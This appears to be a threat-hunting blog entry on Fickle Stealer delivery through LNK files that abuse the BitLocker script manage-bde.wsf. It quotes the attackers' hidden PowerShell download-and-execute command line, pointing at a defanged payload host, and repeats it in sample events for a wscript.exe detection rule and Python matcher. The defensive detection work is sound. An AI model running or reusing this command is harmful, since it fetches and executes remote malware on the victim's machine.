202. Adversaries Misuse a Script for Managing BitLocker to Deliver Fickle Stealer

Hello everyone!

Stealers again! This time we're going to talk about Fickle Stealer and an interesting delivery method leveraged by the threat actors.

So, the adversary used malicious LNK files to misuse a script for managing BitLocker (manage-bde.wsf) to download and execute a PowerShell script:

"C:\Windows\System32\manage-bde.wsf" & powershell -nop -w hidden -c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & "

The script is executed via wscript.exe, so we can build our detection logic on suspicious command line parameters:

event_type: "processcreatewin"

AND

proc_file_path: "wscript.exe"

AND

cmdline: ("manage-bde" AND "powershell" AND "hidden")
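The query above, expressed as a small Python matcher run over a few constructed process-creation events (this is an added example, not code from the original post; the field names follow the query, the sample events and the case-insensitive matching are assumptions):

```python
from typing import Dict, List

# Constructed sample events (not real telemetry). The first mirrors the
# command line quoted in the post; the rest are benign look-alikes that
# should not fire.
SAMPLE_EVENTS = [
    {"event_type": "processcreatewin",
     "proc_file_path": r"C:\Windows\System32\wscript.exe",
     "cmdline": '"C:\\Windows\\System32\\manage-bde.wsf" & powershell -nop -w hidden '
                '-c iex(iwr hxxps://bitacid[.]net/payload/callback.ps1) & "'},
    {"event_type": "processcreatewin",              # legitimate BitLocker status check
     "proc_file_path": r"C:\Windows\System32\wscript.exe",
     "cmdline": r'"C:\Windows\System32\manage-bde.wsf" -status C:'},
    {"event_type": "processcreatewin",              # same script, but via cscript.exe
     "proc_file_path": r"C:\Windows\System32\cscript.exe",
     "cmdline": "cscript.exe //nologo manage-bde.wsf -status"},
    {"event_type": "processcreatewin",              # hidden PowerShell without the script host
     "proc_file_path": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -w hidden -c Get-Date"},
]

REQUIRED_TOKENS = ("manage-bde", "powershell", "hidden")


def matches_rule(event: Dict[str, str]) -> bool:
    """Mirror the post's query: a Windows process-create event whose image is
    wscript.exe and whose command line contains all three tokens.
    Matching is case-insensitive because Windows paths and arguments are."""
    if event.get("event_type") != "processcreatewin":
        return False
    # Compare only the file name, so a different install path still matches.
    path = event.get("proc_file_path", "").replace("/", "\\")
    if path.rsplit("\\", 1)[-1].lower() != "wscript.exe":
        return False
    cmdline = event.get("cmdline", "").lower()
    return all(token in cmdline for token in REQUIRED_TOKENS)


def find_hits(events: List[Dict[str, str]]) -> List[int]:
    """Return the indices of events that trigger the rule."""
    return [i for i, ev in enumerate(events) if matches_rule(ev)]


if __name__ == "__main__":
    for idx in find_hits(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: {SAMPLE_EVENTS[idx]['cmdline']}")
```

Only the first event fires; the third shows that the rule as written does not cover cscript.exe, which can run the same .wsf file, so widening the image check is worth considering.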

See you tomorrow!
